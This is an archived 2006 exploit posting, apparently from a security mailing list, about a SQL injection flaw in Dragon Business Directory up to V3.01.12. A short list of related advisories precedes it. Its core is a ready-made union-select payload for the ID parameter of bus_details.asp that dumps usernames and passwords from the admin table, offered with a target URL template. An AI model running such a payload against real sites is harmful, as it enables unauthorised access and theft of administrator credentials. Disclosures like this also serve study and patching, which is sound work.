Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA23444] a-blog Cross-Site Scripting Vulnerability

[SA23457] opentaps "SEARCH_STRING" Cross-Site Scripting Vulnerability

b2 - 0.5 * [index] Remote File Include Vulnerability

Okul Merkezi Portal v1.0 Remote File IncLude Vuln.

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	25.12.2006
Subject:	Title : Dragon Business Directory <= V3.01.12 (ID) Remote SQL Injection Vulnerability

*******************************************************************************
# Title   :  Dragon Business Directory <= V3.01.12 (ID) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.enthrallweb.us
# $$      :  179.40  USD

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//bus_details.asp?ID=[SQL]

Example:

//bus_details.asp?ID=-1%20union%20select%200,0,username,password,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20admin


[[/SQL]]

""""""""""""""
"""""""
# ajann,Turkey
# ...